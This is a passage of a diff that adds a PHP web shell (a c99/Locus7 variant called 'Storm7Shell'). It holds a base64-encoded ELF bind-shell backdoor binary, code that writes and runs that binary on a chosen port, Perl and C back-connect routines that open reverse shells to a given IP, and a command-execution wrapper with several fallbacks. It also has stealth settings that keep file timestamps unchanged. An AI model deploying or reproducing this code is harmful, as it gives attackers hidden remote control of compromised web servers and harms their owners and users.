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BIwAAAAIAHQAAAAEB+w4NAAEBAQEAAAABAAABAGluaXQuYwAAAAAAqQAAAAIAUAAAAAEB+w4NAAEBAQEAAAABAAABL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UAAGNydGkuUwABAAAAAAUC6IUECAPAAAE9AgEAAQEABQIkiQQIAy4BIS8hWWcCAwABAQAFAoiEBAgDHwEhLz0CBQABAQAFAsSFBAgDCgEhLyFZZz1nLy8wPSEhAgEAAQGIAAAAAgBQAAAAAQH7Dg0AAQEBAQAAAAEAAAEvYnVpbGQvYnVpbGRkL2dsaWJjLTIuMy42L2J1aWxkLXRyZWUvaTM4Ni1saWJjL2NzdQAAY3J0bi5TAAEAAAAABQLohQQIAyEBPQIBAAEBAAUCO4kECAMSAT0hIQIBAAEBAAUCnYQECAMJASECAQABAWluaXQuYwBzaG9ydCBpbnQAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2dsaWJjLTIuMy42L2NzdQBsb25nIGxvbmcgaW50AHVuc2lnbmVkIGNoYXIAR05VIEMgMy40LjYgKFVidW50dSAzLjQuNi0xdWJ1bnR1MikAbG9uZyBsb25nIHVuc2lnbmVkIGludABzaG9ydCB1bnNpZ25lZCBpbnQAX0lPX3N0ZGluX3VzZWQAAC5zeW10YWIALnN0cnRhYgAuc2hzdHJ0YWIALmludGVycAAubm90ZS5BQkktdGFnAC5oYXNoAC5keW5zeW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALmN0b3JzAC5kdG9ycwAuamNyAC5keW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbWVudAAuZGVidWdfYXJhbmdlcwAuZGVidWdfcHVibmFtZXMALmRlYnVnX2luZm8ALmRlYnVnX2FiYnJldgAuZGVidWdfbGluZQAuZGVidWdfc3RyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGwAAAAEAAAACAAAAFIEECBQBAAA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AAAAAEADx/0ADAAAAAAAAeAAAABIAAABQAwAAAAAAAA4AAAASAAAAYQMAAEiJBAgEAAAAEQAOAHADAADUmgQIAAAAABAAFgB9AwAAAAAAADkAAAASAAAAjwMAAAAAAAAAAAAAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
+
+function checkproxyhost(){
+$host = getenv("HTTP_HOST");
+$filename = '/tmp/.setan/xh';
+if (file_exists($filename)) {
+$_POST['proxyhostmsg']="</br></br><center><font color=green size=3><b>Success!</b></font></br></br><a href=$host:6543>$host:6543</a></br></br><b>Note:</b> If '$host' have a good firewall or IDS  installed on their server, it will probably catch this or stop it from ever opening a port and you won't be able to connect to this proxy.</br></br></center>";
+} else {
+$_POST['proxyhostmsg']="</br></br><center><font color=red size=3><b>Failed!</b></font></br></br><b>Note:</b> If for some reason we would not create and extract the need proxy files in '/tmp' this will make this fail.</br></br></center>";
+ } 
+}
+
+if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
+{ 
+ $ip = gethostbyname($_SERVER["HTTP_HOST"]);
+ $por = $_POST['backconnectport'];
+ if(is_writable(".")){
+ cfb("shbd",$backdoor);
+ ex("chmod 777 shbd");
+ $cmd = "./shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+ }else{
+ cfb("/tmp/shbd",$backdoor);
+ ex("chmod 777 /tmp/shbd");
+ $cmd = "./tmp/shbd $por";
+ exec("$cmd > /dev/null &");
+ $scan = myshellexec("ps aux"); 
+ if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
+ $_POST['backcconnmsg']="To connect, use netcat and give it the command <b>'nc $ip $por'</b>.$data";
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
+{
+ if(is_writable(".")){
+ cf("back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("back")) { unlink("back"); }
+ }else{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
+}
+} 
+
+if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
+{
+ if(is_writable(".")){
+ cf("backc",$back_connect_c);
+ ex("chmod 777 backc");
+ //$blah = ex("gcc back.c -o backc");
+ $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("backc")) { unlink("backc"); }
+ }else{
+ ex("chmod 777 /tmp/backc");
+ cf("/tmp/backc",$back_connect_c);
+ //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
+ $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
+ $_POST['backcconnmsg']="Trying to connect to <b>".$_POST['backconnectip']."</b> on port <b>".$_POST['backconnectport']."</b>.";
+ //if (file_exists("back.c")) { unlink("back.c"); }
+ if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
+}
+
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function cfb($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or bberr();
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+
+function err()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't connect!</b>";
+}
+
+function bberr()
+{
+$_POST['backcconnmsge']="</br></br><b><font color=red size=3>Error:</font> Can't backdoor host!</b>";
+}
+
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+//EoW
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+//Start Enumerate function
+//function ENUMERATE()
+
+// $hostname_x=php_uname(n);
+// $itshome = getcwd();
+// $itshome = str_replace("/home/","~",$itshome);
+// $itshome = str_replace("/public_html","/x2300.php",$itshome);
+// $enumerate = "http://".$hostname_x."/".$itshome."";
+
+//End Enumerate function
+
+//Starting calls 
+ini_set("max_execution_time",0); 
+if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}} 
+error_reporting(5); 
+$adires="";
+@ignore_user_abort(TRUE); 
+@set_magic_quotes_runtime(0); 
+$win = strtolower(substr(PHP_OS,0,3)) == "win"; 
+define("starttime",getmicrotime()); 
+if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} 
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); 
+foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} 
+
+$shver = "1.3.37"; //Current version 
+//CONFIGURATION AND SETTINGS 
+if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} 
+elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} 
+else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL 
+} 
+
+$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. 
+
+if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} 
+if (empty($surl)) 
+{ 
+ $surl = "?".$includestr; //Self url 
+} 
+$surl = htmlspecialchars($surl); 
+
+$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. 
+
+//Authentication 
+$login = ""; //login 
+//DON'T FORGOT ABOUT PASSWORD!!! 
+$pass = ""; //password 
+$md5_pass = ""; //md5-cryped pass. if null, md5($pass) 
+
+$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") 
+$login_txt = "Restricted area"; //http-auth message. 
+$accessdeniedmess = "Storm7Shell v.".$shver.": access denied";
+
+$gzipencode = TRUE; //Encode with gzip? 
+
+$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) 
+
+$c99sh_updateurl = "http://locus7s.com/files/lshell_update/"; //Update server 
+$c99sh_sourcesurl = "http://locus7s.com/"; //Sources-server 
+
+$filestealth = TRUE; //if TRUE, don't change modify- and access-time 
+
+$donated_html = "<center><b>Locus7Shell modded by sToRm</b></center>"; 
+/* If you publish free shell and you wish 
+add link to your site or any other information, 
+put here your html. */ 
+$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. 
+
+$curdir = "./"; //start folder 
+//$curdir = getenv("DOCUMENT_ROOT"); 
+$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) 
+$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) 
+
+$log_email = "user@host.tld"; //Default e-mail for sending logs 
+
+$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending 
+$sort_save = TRUE; //If TRUE then save sorting-position using cookies. 
+
+// Registered file-types. 
+//  array( 
+//   "{action1}"=>array("ext1","ext2","ext3",...), 
+//   "{action2}"=>array("ext4","ext5","ext6",...), 
+//   ... 
+//  ) 
+$ftypes  = array( 
+ 'html'=>array('html','htm','shtml'),
